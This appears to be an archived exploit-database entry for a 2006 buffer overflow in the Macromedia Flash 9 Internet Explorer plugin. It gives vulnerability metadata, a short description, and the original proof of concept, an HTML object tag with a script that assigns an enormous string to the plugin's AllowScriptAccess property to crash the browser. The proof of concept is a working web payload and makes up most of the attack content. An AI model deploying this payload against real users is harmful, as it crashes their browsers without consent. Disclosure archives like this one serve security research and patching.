Macromedia Flash Crash

vendor:

Flash

by:

MarjinZ

9,3

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: Flash

Affected Version From: Flash 9 (IE Plugin)

Affected Version To: Flash 9 (IE Plugin)

Patch Exists: NO

Related CWE: N/A

CPE: a:macromedia:flash:9

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2006

This vulnerability is caused by a buffer overflow in the Macromedia Flash 9 (IE Plugin). When a maliciously crafted web page is opened, it causes a crash due to the overflow of the buffer. This vulnerability is unpatched and can be exploited by a malicious attacker.

Mitigation:

The user should avoid opening maliciously crafted web pages.

Source

Exploit-DB raw data:

/*
*
* Macromedia flash crash
* Bug discovered by Mr.Niega
* http://www.swerat.com/
*
* Affected Software: Flash 9 (Ie Plugin)
* Impact: Crash
* Solution Status: Unpatched
*
* E-Mail: MarjinZ@gmail.com
* Credits goes out to MarjinZ
*
*                                        
*    /|    //| |              /|    //| |
*   //|   // | |      __     //|   // | |
*  // |  //  | |   //   ) ) // |  //  | |
* //  | //   | |  //   / / //  | //   | |
*//   |//    | | //   / / //   |//    | |
*
*
*/

<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="allo">
</object>
<script>
var A = 'A';
while (A.length <= 51512*512) A+=A;
allo.AllowScriptAccess = A;
</script>

# milw0rm.com [2006-08-18]